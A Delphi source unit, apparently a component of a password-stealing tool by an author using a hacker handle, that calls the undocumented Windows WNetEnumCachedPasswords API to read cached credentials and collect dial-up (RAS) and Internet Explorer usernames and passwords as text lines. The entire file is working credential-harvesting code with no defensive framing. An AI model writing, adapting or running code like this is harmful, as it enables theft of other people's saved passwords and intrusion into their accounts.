(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untGetPasswords.pas                             ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: class to get cache passwords                  ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untGetPasswords;

interface


uses
  SysUtils, Windows;

 { 1 = Domains
   4 = Mail/MAPI
   6 = RAS
   19 = Internet Explorer }

type
  PWinPassword = ^TWinPassword;
  TWinPassword = record
     EntrySize:Word;
     ResourceSize:Word;
     PasswordSize:Word;
     EntryIndex:Byte;
     EntryType:Byte;
     PasswordC:Char;
  end;

  TGetPasswords = class
  private
    function GetPass: string;
  public
    constructor Create;
    property Passwords:string read GetPass;
  end;

{function WNetEnumCachedPasswords(lp : lpStr; w : Word;
                              b: Byte; pc : Pointer; dw : DWord) : Word; stdcall;// external mpr name 'WNetEnumCachedPasswords';
}
implementation

var
  Count:Integer;
  FPasswords:string;

function WNetEnumCachedPasswords(lp : lpStr; w : Word;
                              b: Byte; pc : Pointer; dw : DWord) : Word;
                              stdcall external mpr name 'WNetEnumCachedPasswords';

function AddPassword(WinPassword:PWinPassword; dw:DWord):LongBool;stdcall;
var
   Password:string;
   PC: array [0..$FF] of Char;
begin
   Inc(Count);
   Move(WinPassword.PasswordC,PC,WinPassword.ResourceSize);
   PC[WinPassword.ResourceSize] := #0;
   CharToOem(PC,PC);
   Password:=StrPas(PC);
   Move(WinPassword.PasswordC,PC,WinPassword.ResourceSize + WinPassword.PasswordSize);
   Move(PC[WinPassword.ResourceSize],PC,WinPassword.PasswordSize);
   PC[WinPassword.PasswordSize]:=#0;
   CharToOem(PC,PC);
   Password:=Password + ':' + StrPas(PC);
   if (WinPassword.EntryType = 6) or (WinPassword.EntryType = 19) then
      FPasswords:=FPasswords + Password + #13#10;
   Result:=True;
end;

constructor TGetPasswords.Create;
begin
   Count:=0;
   FPasswords:='';
   WNetEnumCachedPasswords(nil,0,$FF,@AddPassword,0);
end;

function TGetPasswords.GetPass: string;
begin
   Result:=FPasswords;
end;

end.
